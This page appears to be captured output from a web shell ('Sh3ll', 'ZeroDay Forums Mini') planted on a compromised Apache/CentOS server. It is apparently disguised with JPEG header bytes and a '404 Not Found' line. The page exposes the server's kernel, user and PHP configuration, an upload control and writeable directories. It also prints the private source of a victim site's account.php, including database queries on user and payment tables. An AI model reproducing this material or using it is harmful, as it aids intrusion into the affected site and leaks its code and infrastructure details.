����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/luckymerchan/code/guest/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/luckymerchan/code/guest/account.php
<?php
if(!isset($ob_user->user_id) or intval($ob_user->user_id)==0){
    header('Location: /login.html');
}
$CORE->title_page = 'Account information '.$ob_user->guest_fullname;;
$user_id = intval($ob_user->user_id);

$user_id = intval($ob_user->user_id);
$r_user = $DB->fetch_row($DB->query("SELECT * FROM tb_user WHERE user_id='$user_id' "));
$r_guest = $DB->fetch_row($DB->query("SELECT * FROM tb_guest WHERE user_id='$user_id' "));

$txt_user_type = 'Thành viên';
$txt_user_level = '0';
if($r_guest['guest_so_tien_con_lai']==0){
    if((time()-$r_user['user_jointime']) < (7*24*60*60)) {
        $txt_user_type = 'Dùng thử';
    }
}else{
    $txt_user_type = 'VIP';
    $txt_user_level = $r_guest['guest_vip_levelname'];
}

$q_pay = $DB->query("SELECT * FROM tb_guest_pay_his WHERE user_id='$user_id' ORDER BY ngay_phat_sinh DESC");
$txt_his = '';
$i=1;
while($r_pay = $DB->fetch_row($q_pay)){
    $txt_his .= '<tr id="tr_pay_'.$r_pay['guest_pay_his_id'].'"><td>'.$i.'</td><td>'.date('d-m-Y H:i',strtotime($r_pay['ngay_phat_sinh'])).'</td><td>'.$r_pay['so_diem'].'</td><td>'.$r_pay['nap_type'].'</td><td>'.$r_pay['fee_type'].'</td></tr>';
    $i++;
}
?>

ZeroDay Forums Mini